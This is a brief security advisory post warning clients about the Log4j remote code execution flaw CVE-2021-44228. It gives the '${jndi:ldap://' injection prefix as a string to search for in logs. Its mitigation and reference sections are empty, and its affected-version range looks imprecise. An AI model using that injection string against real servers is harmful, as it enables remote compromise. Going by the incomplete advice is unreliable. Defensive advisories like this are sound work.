BY Ray Stevens / ON Dec 10, 2021
We are writing to inform our readers that a new high profile zero-day vulnerability affecting large number of Java applications through a vulnerable version of the widely-used library Apache log4j.
This is a critical severity issue which can enable a remote attacker the ability to execute arbitrary code in the context of any affected application.
This vulnerability has been designated the identifier CVE-2021-44228 and affects applications using versions of Apache Log4j < 2.14.1-rc2
We are writing to inform our clients of this issue immediately due to the high impact nature of the exploit, the wide use of the underlying vulnerable library within codebases and the fact that it is believed this is already under active exploitation by malicious individuals through a publicly available exploit.
To mitigate this issue:
For further information, please see the following references:
Additionally, to determine if your servers have already seen exploitation attempts, please refer to your application log files (e.g. /var/logs or wherever applicable) and search for presence of the string " ${jndi:ldap://".